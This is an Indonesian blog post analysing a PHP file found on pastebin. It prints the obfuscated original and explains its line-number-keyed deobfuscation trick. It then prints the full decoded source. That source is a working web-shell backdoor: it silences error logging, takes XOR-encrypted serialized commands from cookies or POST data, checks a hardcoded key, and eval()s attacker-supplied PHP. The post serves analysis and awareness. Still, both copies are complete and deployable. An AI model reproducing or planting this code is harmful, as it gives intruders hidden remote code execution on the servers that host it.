Jadi, tadi sempat lihat ada posting di pastebin yang menarik. Berikut ini source bagian n3pnqlazat.php di link pastebin itu:

<?php


eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
?>

Entah itu backdoor atau bukan, tapi teknik yang digunakan cukup unik. Jadi, variabel $dgreusdi isinya adalah baris dimana variabel itu berada dikalikan dengan nilai 337. Kalau sourcenya diedit dan baris itu berubah, maka proses deobfuscate akan gagal. Ini terkait dengan baris ini: $a = str_replace($dgreusdi, "E", $a); dimana isi dari variabel a yang berisi integer yang nilainya ada pada variabel $dgreusdi akan diganti dengan huruf E. Dan nilai variabel $dgreusdi yang benar adalah 674, yaitu jika baris dimana variabel tersebut berada adalah baris 2. Berikut ini adalah source code yang sudah di-deobfuscate:

<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

$approvals = False;

foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;
    $manager_invitation = $cookie_one;
    $approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

    if ($approvals)
    {
        break;
    }
}

function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

function append_strings($append, $string)
{
    return $append ^ $string;
}

if (!$approvals)
{
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
        $approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

        if ($approvals)
        {
            break;
        }
    }
}

function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);
            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    switch ($approvals['a']){
        case "i":
            $array = Array();
            $array['pv'] = @phpversion();
            $array['sv'] = '1.0-1';
            echo @serialize($array);
            break;
        case "e":
            eval($approvals['d']);
            break;
    }
    exit();

}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}

function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));
    return make_submission($sub, $sub_meta);
}

function _base64_decode($input)
{
    $buffer = "";
    $tbl = Array(
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54,
        55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2,
        3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
        48, 49, 50, 51, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1);

    for ($i = 0; $i < strlen($input); ) {
        $b = 0;
        if ($tbl[ord($input[$i])] != -1) {
            $b = ($tbl[ord($input[$i])] & 0xFF) << 18;
        }
        else {
            $i++;
            continue;
        }

        $num = 0;
        if ($i + 1 < strlen($input) && $tbl[ord($input[$i+1])] != -1) {
            $b = $b | (($tbl[ord($input[$i+1])] & 0xFF) << 12);
            $num++;
        }

        if ($i + 2 < strlen($input) && $tbl[ord($input[$i+2])] != -1) {
            $b = $b | (($tbl[ord($input[$i+2])] & 0xFF) << 6);
            $num++;
        }

        if ($i + 3 < strlen($input) && $tbl[ord($input[$i+3])] != -1) {
            $b = $b | ($tbl[ord($input[$i+3])] & 0xFF);
            $num++;
        }

        while ($num > 0) {
            $c = ($b & 0xFF0000) >> 16;
            $buffer .=chr($c);
            $b <<= 8;
            $num--;
        }
        $i += 4;
    }
    return $buffer;
}
?>

Sekian tulisan singkat kali ini, semoga bermanfaat.